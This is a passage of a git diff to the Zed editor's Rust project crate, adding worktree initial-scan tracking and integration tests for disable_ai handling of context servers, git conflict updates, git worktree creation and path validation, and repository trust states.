+ } + } + } + + /// Returns whether all visible worktrees have completed their initial scan. + pub fn initial_scan_completed(&self) -> bool { + *self.initial_scan_complete.1.borrow() + } + + /// Checks whether all visible worktrees have completed their initial scan + /// and no worktree creations are pending, and updates the watch channel accordingly. + fn update_initial_scan_state(&mut self, cx: &App) { + let complete = self.loading_worktrees.is_empty() + && self + .visible_worktrees(cx) + .all(|wt| wt.read(cx).completed_scan_id() >= 1); + *self.initial_scan_complete.0.borrow_mut() = complete; + } + + /// Spawns a detached task that waits for a worktree's initial scan to complete, + /// then rechecks and updates the aggregate initial scan state. + fn observe_worktree_scan_completion( + &mut self, + worktree: &Entity, + cx: &mut Context, + ) { + let await_scan = worktree.update(cx, |worktree, _cx| worktree.wait_for_snapshot(1)); + cx.spawn(async move |this, cx| { + await_scan.await.ok(); + this.update(cx, |this, cx| { + this.update_initial_scan_state(cx); + }) + .ok(); + anyhow::Ok(()) + }) + .detach(); } /// Iterates through all worktrees, including ones that don't appear in the project panel @@ -554,12 +610,22 @@ impl WorktreeStore { self.loading_worktrees .insert(abs_path.clone(), task.shared()); + + if visible && self.scanning_enabled { + *self.initial_scan_complete.0.borrow_mut() = false; + } } let task = self.loading_worktrees.get(&abs_path).unwrap().clone(); cx.spawn(async move |this, cx| { let result = task.await; - this.update(cx, |this, _| this.loading_worktrees.remove(&abs_path)) - .ok(); + this.update(cx, |this, cx| { + this.loading_worktrees.remove(&abs_path); + if !visible || !this.scanning_enabled || result.is_err() { + this.update_initial_scan_state(cx); + } + }) + .ok(); + match result { Ok(worktree) => { if !is_via_collab { @@ -578,6 +644,13 @@ impl WorktreeStore { ); }); } + + this.update(cx, |this, cx| { + if this.scanning_enabled && visible { + this.observe_worktree_scan_completion(&worktree, cx); + } + }) + .ok(); } Ok(worktree) } @@ -735,6 +808,11 @@ impl WorktreeStore { worktree::Event::DeletedEntry(id) => { cx.emit(WorktreeStoreEvent::WorktreeDeletedEntry(worktree_id, *id)) } + worktree::Event::Deleted => { + // The worktree root itself has been deleted (for single-file worktrees) + // The worktree will be removed via the observe_release callback + } + worktree::Event::UpdatedRootRepoCommonDir => {} } }) .detach(); @@ -768,9 +846,25 @@ impl WorktreeStore { false } }); + self.update_initial_scan_state(cx); self.send_project_updates(cx); } + pub fn worktree_for_main_worktree_path( + &self, + path: &Path, + cx: &App, + ) -> Option> { + self.visible_worktrees(cx).find(|worktree| { + let worktree = worktree.read(cx); + if let Some(common_dir) = worktree.root_repo_common_dir() { + common_dir.parent() == Some(path) + } else { + worktree.abs_path().as_ref() == path + } + }) + } + pub fn set_worktrees_reordered(&mut self, worktrees_reordered: bool) { self.worktrees_reordered = worktrees_reordered; } diff --git a/crates/project/tests/integration/context_server_store.rs b/crates/project/tests/integration/context_server_store.rs index 56bdaed41cd77b665d316491e051582c7ccc078a..5b68e11bb95a8b9178a8febf91849ba3a65f76e6 100644 --- a/crates/project/tests/integration/context_server_store.rs +++ b/crates/project/tests/integration/context_server_store.rs @@ -8,10 +8,11 @@ use project::context_server_store::*; use project::project_settings::ContextServerSettings; use project::worktree_store::WorktreeStore; use project::{ - FakeFs, Project, context_server_store::registry::ContextServerDescriptor, + DisableAiSettings, FakeFs, Project, context_server_store::registry::ContextServerDescriptor, project_settings::ProjectSettings, }; use serde_json::json; +use settings::settings_content::SaturatingBool; use settings::{ContextServerCommand, Settings, SettingsStore}; use std::sync::Arc; use std::{cell::RefCell, path::PathBuf, rc::Rc}; @@ -553,6 +554,116 @@ async fn test_context_server_enabled_disabled(cx: &mut TestAppContext) { } } +#[gpui::test] +async fn test_context_server_respects_disable_ai(cx: &mut TestAppContext) { + const SERVER_1_ID: &str = "mcp-1"; + + let server_1_id = ContextServerId(SERVER_1_ID.into()); + + // Set up SettingsStore with disable_ai: true in user settings BEFORE creating project + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + DisableAiSettings::register(cx); + // Set disable_ai via user settings (not override_global) so it persists through recompute_values + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |content| { + content.project.disable_ai = Some(SaturatingBool(true)); + }); + }); + }); + + // Now create the project (ContextServerStore will see disable_ai = true) + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/test"), json!({"code.rs": ""})).await; + let project = Project::test(fs.clone(), [path!("/test").as_ref()], cx).await; + + let executor = cx.executor(); + let store = project.read_with(cx, |project, _| project.context_server_store()); + store.update(cx, |store, _| { + store.set_context_server_factory(Box::new(move |id, _| { + Arc::new(ContextServer::new( + id.clone(), + Arc::new(create_fake_transport(id.0.to_string(), executor.clone())), + )) + })); + }); + + set_context_server_configuration( + vec![( + server_1_id.0.clone(), + settings::ContextServerSettingsContent::Stdio { + enabled: true, + remote: false, + command: ContextServerCommand { + path: "somebinary".into(), + args: vec!["arg".to_string()], + env: None, + timeout: None, + }, + }, + )], + cx, + ); + + cx.run_until_parked(); + + // Verify that no server started because AI is disabled + cx.update(|cx| { + assert_eq!( + store.read(cx).status_for_server(&server_1_id), + None, + "Server should not start when disable_ai is true" + ); + }); + + // Enable AI and verify server starts + { + let _server_events = assert_server_events( + &store, + vec![ + (server_1_id.clone(), ContextServerStatus::Starting), + (server_1_id.clone(), ContextServerStatus::Running), + ], + cx, + ); + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |content| { + content.project.disable_ai = Some(SaturatingBool(false)); + }); + }); + }); + cx.run_until_parked(); + } + + // Disable AI again and verify server stops + { + let _server_events = assert_server_events( + &store, + vec![(server_1_id.clone(), ContextServerStatus::Stopped)], + cx, + ); + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |content| { + content.project.disable_ai = Some(SaturatingBool(true)); + }); + }); + }); + cx.run_until_parked(); + } + + // Verify server is stopped + cx.update(|cx| { + assert_eq!( + store.read(cx).status_for_server(&server_1_id), + Some(ContextServerStatus::Stopped), + "Server should be stopped when disable_ai is true" + ); + }); +} + #[gpui::test] async fn test_server_ids_includes_disabled_servers(cx: &mut TestAppContext) { const ENABLED_SERVER_ID: &str = "enabled-server"; diff --git a/crates/project/tests/integration/debugger.rs b/crates/project/tests/integration/debugger.rs index 2a15f8bc55b611b3b2fbd23fb9ccb052cadac387..61bba78c74baec2e48b172043b3b504ccf32dba9 100644 --- a/crates/project/tests/integration/debugger.rs +++ b/crates/project/tests/integration/debugger.rs @@ -3,7 +3,7 @@ mod go_locator { use dap::{DapLocator, adapters::DebugAdapterName}; use gpui::TestAppContext; use project::debugger::locators::go::{DelveLaunchRequest, GoLocator}; - use task::{HideStrategy, RevealStrategy, RevealTarget, Shell, TaskTemplate}; + use task::{HideStrategy, RevealStrategy, RevealTarget, SaveStrategy, Shell, TaskTemplate}; #[gpui::test] async fn test_create_scenario_for_go_build(_: &mut TestAppContext) { let locator = GoLocator; @@ -22,6 +22,8 @@ mod go_locator { tags: vec![], show_summary: true, show_command: true, + save: SaveStrategy::default(), + hooks: Default::default(), }; let scenario = locator @@ -49,6 +51,8 @@ mod go_locator { tags: vec![], show_summary: true, show_command: true, + save: SaveStrategy::default(), + hooks: Default::default(), }; let scenario = locator @@ -187,6 +191,8 @@ mod go_locator { tags: vec![], show_summary: true, show_command: true, + save: SaveStrategy::default(), + hooks: Default::default(), }; let scenario = locator @@ -221,6 +227,8 @@ mod python_locator { shell: task::Shell::System, show_summary: false, show_command: false, + save: task::SaveStrategy::default(), + hooks: Default::default(), }; let expected_scenario = DebugScenario { diff --git a/crates/project/tests/integration/ext_agent_tests.rs b/crates/project/tests/integration/ext_agent_tests.rs index f3c398a619a81ee81146de16f8e58b1093569e8a..bd4acf2b3e9419b62ff676331383b48f98874345 100644 --- a/crates/project/tests/integration/ext_agent_tests.rs +++ b/crates/project/tests/integration/ext_agent_tests.rs @@ -10,7 +10,6 @@ impl ExternalAgentServer for NoopExternalAgent { fn get_command( &mut self, _extra_env: HashMap, - _status_tx: Option>, _new_version_available_tx: Option>>, _cx: &mut AsyncApp, ) -> Task> { @@ -21,6 +20,10 @@ impl ExternalAgentServer for NoopExternalAgent { })) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ -28,7 +31,7 @@ impl ExternalAgentServer for NoopExternalAgent { #[test] fn external_agent_server_name_display() { - let name = ExternalAgentServerName(SharedString::from("Ext: Tool")); + let name = AgentId(SharedString::from("Ext: Tool")); let mut s = String::new(); write!(&mut s, "{name}").unwrap(); assert_eq!(s, "Ext: Tool"); @@ -40,7 +43,7 @@ fn sync_extension_agents_removes_previous_extension_entries() { // Seed with a couple of agents that will be replaced by extensions store.external_agents.insert( - ExternalAgentServerName(SharedString::from("foo-agent")), + AgentId(SharedString::from("foo-agent")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Custom, @@ -49,7 +52,7 @@ fn sync_extension_agents_removes_previous_extension_entries() { ), ); store.external_agents.insert( - ExternalAgentServerName(SharedString::from("bar-agent")), + AgentId(SharedString::from("bar-agent")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Custom, @@ -58,7 +61,7 @@ fn sync_extension_agents_removes_previous_extension_entries() { ), ); store.external_agents.insert( - ExternalAgentServerName(SharedString::from("custom")), + AgentId(SharedString::from("custom")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Custom, diff --git a/crates/project/tests/integration/extension_agent_tests.rs b/crates/project/tests/integration/extension_agent_tests.rs index eff41a99cab878336206f232450f3c1b490d1fc8..577bc3b2901c52f4f47d9d0c82ef89fc66e2c21a 100644 --- a/crates/project/tests/integration/extension_agent_tests.rs +++ b/crates/project/tests/integration/extension_agent_tests.rs @@ -9,14 +9,14 @@ use std::{any::Any, path::PathBuf, sync::Arc}; #[test] fn extension_agent_constructs_proper_display_names() { // Verify the display name format for extension-provided agents - let name1 = ExternalAgentServerName(SharedString::from("Extension: Agent")); + let name1 = AgentId(SharedString::from("Extension: Agent")); assert!(name1.0.contains(": ")); - let name2 = ExternalAgentServerName(SharedString::from("MyExt: MyAgent")); + let name2 = AgentId(SharedString::from("MyExt: MyAgent")); assert_eq!(name2.0, "MyExt: MyAgent"); // Non-extension agents shouldn't have the separator - let custom = ExternalAgentServerName(SharedString::from("custom")); + let custom = AgentId(SharedString::from("custom")); assert!(!custom.0.contains(": ")); } @@ -26,7 +26,6 @@ impl ExternalAgentServer for NoopExternalAgent { fn get_command( &mut self, _extra_env: HashMap, - _status_tx: Option>, _new_version_available_tx: Option>>, _cx: &mut AsyncApp, ) -> Task> { @@ -37,6 +36,10 @@ impl ExternalAgentServer for NoopExternalAgent { })) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ -48,7 +51,7 @@ fn sync_removes_only_extension_provided_agents() { // Seed with extension agents (contain ": ") and custom agents (don't contain ": ") store.external_agents.insert( - ExternalAgentServerName(SharedString::from("Ext1: Agent1")), + AgentId(SharedString::from("Ext1: Agent1")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Extension, @@ -57,7 +60,7 @@ fn sync_removes_only_extension_provided_agents() { ), ); store.external_agents.insert( - ExternalAgentServerName(SharedString::from("Ext2: Agent2")), + AgentId(SharedString::from("Ext2: Agent2")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Extension, @@ -66,7 +69,7 @@ fn sync_removes_only_extension_provided_agents() { ), ); store.external_agents.insert( - ExternalAgentServerName(SharedString::from("custom-agent")), + AgentId(SharedString::from("custom-agent")), ExternalAgentEntry::new( Box::new(NoopExternalAgent) as Box, ExternalAgentSource::Custom, @@ -85,7 +88,7 @@ fn sync_removes_only_extension_provided_agents() { assert!( store .external_agents - .contains_key(&ExternalAgentServerName(SharedString::from("custom-agent"))) + .contains_key(&AgentId(SharedString::from("custom-agent"))) ); } @@ -118,7 +121,7 @@ fn archive_launcher_constructs_with_all_fields() { }; // Verify display name construction - let expected_name = ExternalAgentServerName(SharedString::from("GitHub Agent")); + let expected_name = AgentId(SharedString::from("GitHub Agent")); assert_eq!(expected_name.0, "GitHub Agent"); } @@ -139,6 +142,7 @@ async fn archive_agent_uses_extension_and_agent_id_for_cache_key(cx: &mut TestAp project_environment, extension_id: Arc::from("my-extension"), agent_id: Arc::from("my-agent"), + version: Some(SharedString::from("1.0.0")), targets: { let mut map = HashMap::default(); map.insert( @@ -158,6 +162,7 @@ async fn archive_agent_uses_extension_and_agent_id_for_cache_key(cx: &mut TestAp map.insert("PORT".into(), "8080".into()); map }, + new_version_available_tx: None, }; // Verify agent is properly constructed @@ -171,7 +176,7 @@ async fn archive_agent_uses_extension_and_agent_id_for_cache_key(cx: &mut TestAp fn sync_extension_agents_registers_archive_launcher() { use extension::AgentServerManifestEntry; - let expected_name = ExternalAgentServerName(SharedString::from("Release Agent")); + let expected_name = AgentId(SharedString::from("Release Agent")); assert_eq!(expected_name.0, "Release Agent"); // Verify the manifest entry structure for archive-based installation @@ -221,6 +226,7 @@ async fn test_node_command_uses_managed_runtime(cx: &mut TestAppContext) { project_environment, extension_id: Arc::from("node-extension"), agent_id: Arc::from("node-agent"), + version: Some(SharedString::from("1.0.0")), targets: { let mut map = HashMap::default(); map.insert( @@ -236,6 +242,7 @@ async fn test_node_command_uses_managed_runtime(cx: &mut TestAppContext) { map }, env: HashMap::default(), + new_version_available_tx: None, }; // Verify that when cmd is "node", it attempts to use the node runtime @@ -265,6 +272,7 @@ async fn test_commands_run_in_extraction_directory(cx: &mut TestAppContext) { project_environment, extension_id: Arc::from("test-ext"), agent_id: Arc::from("test-agent"), + version: Some(SharedString::from("1.0.0")), targets: { let mut map = HashMap::default(); map.insert( @@ -284,6 +292,7 @@ async fn test_commands_run_in_extraction_directory(cx: &mut TestAppContext) { map }, env: Default::default(), + new_version_available_tx: None, }; // Verify the agent is configured with relative paths in args diff --git a/crates/project/tests/integration/git_store.rs b/crates/project/tests/integration/git_store.rs index 43704953e0d0bd3e81b9b63b5a797934970dcafa..02f752b28b24a8135e2cba9307a5eacdc16f0fa3 100644 --- a/crates/project/tests/integration/git_store.rs +++ b/crates/project/tests/integration/git_store.rs @@ -336,7 +336,7 @@ mod conflict_set_tests { second_head: UnmergedStatusCode::Updated, }, ); - // Cause the repository to emit MergeHeadsChanged. + // Cause the repository to update cached conflicts state.refs.insert("MERGE_HEAD".into(), "123".into()) }) .unwrap(); @@ -461,6 +461,168 @@ mod conflict_set_tests { assert_eq!(conflict_range, Point::new(1, 0)..Point::new(6, 0)); }); } + + #[gpui::test] + async fn test_conflict_updates_with_delayed_merge_head_conflicts( + executor: BackgroundExecutor, + cx: &mut TestAppContext, + ) { + zlog::init_test(); + cx.update(|cx| { + settings::init(cx); + }); + + let initial_text = " + one + two + three + four + " + .unindent(); + + let conflicted_text = " + one + <<<<<<< HEAD + two + ======= + TWO + >>>>>>> branch + three + four + " + .unindent(); + + let resolved_text = " + one + TWO + three + four + " + .unindent(); + + let fs = FakeFs::new(executor); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "a.txt": initial_text, + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; + let (git_store, buffer) = project.update(cx, |project, cx| { + ( + project.git_store().clone(), + project.open_local_buffer(path!("/project/a.txt"), cx), + ) + }); + let buffer = buffer.await.unwrap(); + let conflict_set = git_store.update(cx, |git_store, cx| { + git_store.open_conflict_set(buffer.clone(), cx) + }); + + let (events_tx, events_rx) = mpsc::channel::(); + let _conflict_set_subscription = cx.update(|cx| { + cx.subscribe(&conflict_set, move |_, event, _| { + events_tx.send(event.clone()).ok(); + }) + }); + + cx.run_until_parked(); + events_rx + .try_recv() + .expect_err("conflict set should start empty"); + + fs.with_git_state(path!("/project/.git").as_ref(), true, |state| { + state.refs.insert("MERGE_HEAD".into(), "123".into()) + }) + .unwrap(); + + cx.run_until_parked(); + events_rx + .try_recv() + .expect_err("merge head without conflicted paths should not publish conflicts"); + conflict_set.update(cx, |conflict_set, _| { + assert!(!conflict_set.has_conflict); + assert_eq!(conflict_set.snapshot.conflicts.len(), 0); + }); + + buffer.update(cx, |buffer, cx| { + buffer.set_text(conflicted_text.clone(), cx); + }); + fs.with_git_state(path!("/project/.git").as_ref(), true, |state| { + state.unmerged_paths.insert( + repo_path("a.txt"), + UnmergedStatus { + first_head: UnmergedStatusCode::Updated, + second_head: UnmergedStatusCode::Updated, + }, + ); + }) + .unwrap(); + + cx.run_until_parked(); + let update = events_rx + .try_recv() + .expect("conflicts should appear once conflicted paths are visible"); + assert_eq!(update.old_range, 0..0); + assert_eq!(update.new_range, 0..1); + conflict_set.update(cx, |conflict_set, cx| { + assert!(conflict_set.has_conflict); + let conflict_range = conflict_set.snapshot().conflicts[0] + .range + .to_point(buffer.read(cx)); + assert_eq!(conflict_range, Point::new(1, 0)..Point::new(6, 0)); + }); + + buffer.update(cx, |buffer, cx| { + buffer.set_text(resolved_text.clone(), cx); + }); + + cx.run_until_parked(); + let update = events_rx + .try_recv() + .expect("resolved buffer text should clear visible conflict markers"); + assert_eq!(update.old_range, 0..1); + assert_eq!(update.new_range, 0..0); + conflict_set.update(cx, |conflict_set, _| { + assert!(conflict_set.has_conflict); + assert_eq!(conflict_set.snapshot.conflicts.len(), 0); + }); + + fs.with_git_state(path!("/project/.git").as_ref(), true, |state| { + state.refs.insert("MERGE_HEAD".into(), "456".into()); + }) + .unwrap(); + + cx.run_until_parked(); + events_rx.try_recv().expect_err( + "merge-head change without unmerged-path changes should not emit marker updates", + ); + conflict_set.update(cx, |conflict_set, _| { + assert!(conflict_set.has_conflict); + assert_eq!(conflict_set.snapshot.conflicts.len(), 0); + }); + + fs.with_git_state(path!("/project/.git").as_ref(), true, |state| { + state.unmerged_paths.remove(&repo_path("a.txt")); + state.refs.remove("MERGE_HEAD"); + }) + .unwrap(); + + cx.run_until_parked(); + let update = events_rx.try_recv().expect( + "status catch-up should emit a no-op update when clearing stale conflict state", + ); + assert_eq!(update.old_range, 0..0); + assert_eq!(update.new_range, 0..0); + assert!(update.buffer_range.is_none()); + conflict_set.update(cx, |conflict_set, _| { + assert!(!conflict_set.has_conflict); + assert_eq!(conflict_set.snapshot.conflicts.len(), 0); + }); + } } mod git_traversal { @@ -1012,3 +1174,477 @@ mod git_traversal { pretty_assertions::assert_eq!(found_statuses, expected_statuses); } } + +mod git_worktrees { + use fs::FakeFs; + use gpui::TestAppContext; + use project::worktrees_directory_for_repo; + use serde_json::json; + use settings::SettingsStore; + use std::path::{Path, PathBuf}; + use util::path; + fn init_test(cx: &mut gpui::TestAppContext) { + zlog::init_test(); + + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + }); + } + + #[test] + fn test_validate_worktree_directory() { + let work_dir = Path::new("/code/my-project"); + + // Valid: sibling + assert!(worktrees_directory_for_repo(work_dir, "../worktrees").is_ok()); + + // Valid: subdirectory + assert!(worktrees_directory_for_repo(work_dir, ".git/zed-worktrees").is_ok()); + assert!(worktrees_directory_for_repo(work_dir, "my-worktrees").is_ok()); + + // Invalid: just ".." would resolve back to the working directory itself + let err = worktrees_directory_for_repo(work_dir, "..").unwrap_err(); + assert!(err.to_string().contains("must not be \"..\"")); + + // Invalid: ".." with trailing separators + let err = worktrees_directory_for_repo(work_dir, "..\\").unwrap_err(); + assert!(err.to_string().contains("must not be \"..\"")); + let err = worktrees_directory_for_repo(work_dir, "../").unwrap_err(); + assert!(err.to_string().contains("must not be \"..\"")); + + // Invalid: empty string would resolve to the working directory itself + let err = worktrees_directory_for_repo(work_dir, "").unwrap_err(); + assert!(err.to_string().contains("must not be empty")); + + // Invalid: absolute path + let err = worktrees_directory_for_repo(work_dir, "/tmp/worktrees").unwrap_err(); + assert!(err.to_string().contains("relative path")); + + // Invalid: "/" is absolute on Unix + let err = worktrees_directory_for_repo(work_dir, "/").unwrap_err(); + assert!(err.to_string().contains("relative path")); + + // Invalid: "///" is absolute + let err = worktrees_directory_for_repo(work_dir, "///").unwrap_err(); + assert!(err.to_string().contains("relative path")); + + // Invalid: escapes too far up + let err = worktrees_directory_for_repo(work_dir, "../../other-project/wt").unwrap_err(); + assert!(err.to_string().contains("outside")); + } + + #[gpui::test] + async fn test_git_worktrees_list_and_create(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/root"), + json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + cx.executor().run_until_parked(); + + let repository = project.read_with(cx, |project, cx| { + project.repositories(cx).values().next().unwrap().clone() + }); + + let worktrees = cx + .update(|cx| repository.update(cx, |repository, _| repository.worktrees())) + .await + .unwrap() + .unwrap(); + assert_eq!(worktrees.len(), 1); + assert_eq!(worktrees[0].path, PathBuf::from(path!("/root"))); + + let worktrees_directory = PathBuf::from(path!("/root")); + let worktree_1_directory = worktrees_directory.join("feature-branch"); + cx.update(|cx| { + repository.update(cx, |repository, _| { + repository.create_worktree( + "feature-branch".to_string(), + worktree_1_directory.clone(), + Some("abc123".to_string()), + ) + }) + }) + .await + .unwrap() + .unwrap(); + + cx.executor().run_until_parked(); + + let worktrees = cx + .update(|cx| repository.update(cx, |repository, _| repository.worktrees())) + .await + .unwrap() + .unwrap(); + assert_eq!(worktrees.len(), 2); + assert_eq!(worktrees[0].path, PathBuf::from(path!("/root"))); + assert_eq!(worktrees[1].path, worktree_1_directory); + assert_eq!( + worktrees[1].ref_name, + Some("refs/heads/feature-branch".into()) + ); + assert_eq!(worktrees[1].sha.as_ref(), "abc123"); + + let worktree_2_directory = worktrees_directory.join("bugfix-branch"); + cx.update(|cx| { + repository.update(cx, |repository, _| { + repository.create_worktree( + "bugfix-branch".to_string(), + worktree_2_directory.clone(), + None, + ) + }) + }) + .await + .unwrap() + .unwrap(); + + cx.executor().run_until_parked(); + + // List worktrees — should now have main + two created + let worktrees = cx + .update(|cx| repository.update(cx, |repository, _| repository.worktrees())) + .await + .unwrap() + .unwrap(); + assert_eq!(worktrees.len(), 3); + + let worktree_1 = worktrees + .iter() + .find(|worktree| worktree.ref_name == Some("refs/heads/feature-branch".into())) + .expect("should find feature-branch worktree"); + assert_eq!(worktree_1.path, worktree_1_directory); + + let worktree_2 = worktrees + .iter() + .find(|worktree| worktree.ref_name == Some("refs/heads/bugfix-branch".into())) + .expect("should find bugfix-branch worktree"); + assert_eq!(worktree_2.path, worktree_2_directory); + assert_eq!(worktree_2.sha.as_ref(), "fake-sha"); + } + + use crate::Project; +} + +mod trust_tests { + use collections::HashSet; + use fs::FakeFs; + use gpui::TestAppContext; + use project::trusted_worktrees::*; + + use serde_json::json; + use settings::SettingsStore; + use util::path; + + use crate::Project; + + fn init_test(cx: &mut TestAppContext) { + zlog::init_test(); + + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + }); + } + + #[gpui::test] + async fn test_repository_defaults_to_untrusted_without_trust_system(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "a.txt": "hello", + }), + ) + .await; + + // Create project without trust system — repos should default to untrusted. + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + cx.executor().run_until_parked(); + + let repository = project.read_with(cx, |project, cx| { + project.repositories(cx).values().next().unwrap().clone() + }); + + repository.read_with(cx, |repo, _| { + assert!( + !repo.is_trusted(), + "repository should default to untrusted when no trust system is initialized" + ); + }); + } + + #[gpui::test] + async fn test_multiple_repos_trust_with_single_worktree(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "a.txt": "hello", + "sub": { + ".git": {}, + "b.txt": "world", + }, + }), + ) + .await; + + cx.update(|cx| { + init(DbTrustedPaths::default(), cx); + }); + + let project = + Project::test_with_worktree_trust(fs.clone(), [path!("/project").as_ref()], cx).await; + cx.executor().run_until_parked(); + + let worktree_store = project.read_with(cx, |project, _| project.worktree_store()); + let worktree_id = worktree_store.read_with(cx, |store, cx| { + store.worktrees().next().unwrap().read(cx).id() + }); + + let repos = project.read_with(cx, |project, cx| { + project + .repositories(cx) + .values() + .cloned() + .collect::>() + }); + assert_eq!(repos.len(), 2, "should have two repositories"); + for repo in &repos { + repo.read_with(cx, |repo, _| { + assert!( + !repo.is_trusted(), + "all repos should be untrusted initially" + ); + }); + } + + let trusted_worktrees = cx + .update(|cx| TrustedWorktrees::try_get_global(cx).expect("trust global should be set")); + trusted_worktrees.update(cx, |store, cx| { + store.trust( + &worktree_store, + HashSet::from_iter([PathTrust::Worktree(worktree_id)]), + cx, + ); + }); + cx.executor().run_until_parked(); + + for repo in &repos { + repo.read_with(cx, |repo, _| { + assert!( + repo.is_trusted(), + "all repos should be trusted after worktree is trusted" + ); + }); + } + } + + #[gpui::test] + async fn test_repository_trust_restrict_trust_cycle(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "a.txt": "hello", + }), + ) + .await; + + cx.update(|cx| { + project::trusted_worktrees::init(DbTrustedPaths::default(), cx); + }); + + let project = + Project::test_with_worktree_trust(fs.clone(), [path!("/project").as_ref()], cx).await; + cx.executor().run_until_parked(); + + let worktree_store = project.read_with(cx, |project, _| project.worktree_store()); + let worktree_id = worktree_store.read_with(cx, |store, cx| { + store.worktrees().next().unwrap().read(cx).id() + }); + + let repository = project.read_with(cx, |project, cx| { + project.repositories(cx).values().next().unwrap().clone() + }); + + repository.read_with(cx, |repo, _| { + assert!(!repo.is_trusted(), "repository should start untrusted"); + }); + + let trusted_worktrees = cx + .update(|cx| TrustedWorktrees::try_get_global(cx).expect("trust global should be set")); + + trusted_worktrees.update(cx, |store, cx| { + store.trust( + &worktree_store, + HashSet::from_iter([PathTrust::Worktree(worktree_id)]), + cx, + ); + }); + cx.executor().run_until_parked(); + + repository.read_with(cx, |repo, _| { + assert!( + repo.is_trusted(), + "repository should be trusted after worktree is trusted" + ); + }); + + trusted_worktrees.update(cx, |store, cx| { + store.restrict( + worktree_store.downgrade(), + HashSet::from_iter([PathTrust::Worktree(worktree_id)]), + cx, + ); + }); + cx.executor().run_until_parked(); + + repository.read_with(cx, |repo, _| { + assert!( + !repo.is_trusted(), + "repository should be untrusted after worktree is restricted" + ); + }); + + trusted_worktrees.update(cx, |store, cx| { + store.trust( + &worktree_store, + HashSet::from_iter([PathTrust::Worktree(worktree_id)]), + cx, + ); + }); + cx.executor().run_until_parked(); + + repository.read_with(cx, |repo, _| { + assert!( + repo.is_trusted(), + "repository should be trusted again after second trust" + ); + }); + } +} + +mod resolve_worktree_tests { + use fs::FakeFs; + use gpui::TestAppContext; + use project::{git_store::resolve_git_worktree_to_main_repo, linked_worktree_short_name}; + use serde_json::json; + use std::path::{Path, PathBuf}; + + #[gpui::test] + async fn test_resolve_git_worktree_to_main_repo(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + // Set up a main repo with a worktree entry + fs.insert_tree( + "/main-repo", + json!({ + ".git": { + "worktrees": { + "feature": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + // Set up a worktree checkout pointing back to the main repo + fs.insert_tree( + "/worktree-checkout", + json!({ + ".git": "gitdir: /main-repo/.git/worktrees/feature", + "src": { "main.rs": "" } + }), + ) + .await; + + let result = + resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/worktree-checkout")).await; + assert_eq!(result, Some(PathBuf::from("/main-repo"))); + } + + #[gpui::test] + async fn test_resolve_git_worktree_normal_repo_returns_none(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/repo", + json!({ + ".git": {}, + "src": { "main.rs": "" } + }), + ) + .await; + + let result = resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/repo")).await; + assert_eq!(result, None); + } + + #[gpui::test] + async fn test_resolve_git_worktree_no_git_returns_none(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/plain", + json!({ + "src": { "main.rs": "" } + }), + ) + .await; + + let result = resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/plain")).await; + assert_eq!(result, None); + } + + #[gpui::test] + async fn test_resolve_git_worktree_nonexistent_returns_none(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + + let result = + resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/does-not-exist")).await; + assert_eq!(result, None); + } + + #[test] + fn test_linked_worktree_short_name() { + let examples = [ + ( + "/home/bob/zed", + "/home/bob/worktrees/olivetti/zed", + Some("olivetti".into()), + ), + ("/home/bob/zed", "/home/bob/zed2", Some("zed2".into())), + ( + "/home/bob/zed", + "/home/bob/worktrees/zed/selectric", + Some("selectric".into()), + ), + ("/home/bob/zed", "/home/bob/zed", None), + ]; + for (main_worktree_path, linked_worktree_path, expected) in examples { + let short_name = linked_worktree_short_name( + Path::new(main_worktree_path), + Path::new(linked_worktree_path), + ); + assert_eq!( + short_name, expected, + "short name for {linked_worktree_path:?}, linked worktree of {main_worktree_path:?}, should be {expected:?}" + ); + } + } +} diff --git a/crates/project/tests/integration/lsp_store.rs b/crates/project/tests/integration/lsp_store.rs index 91d5ca1697255a07c0bc9bb37869d87773792297..7d266ff1365485032458d6de033b57f106602869 100644 --- a/crates/project/tests/integration/lsp_store.rs +++ b/crates/project/tests/integration/lsp_store.rs @@ 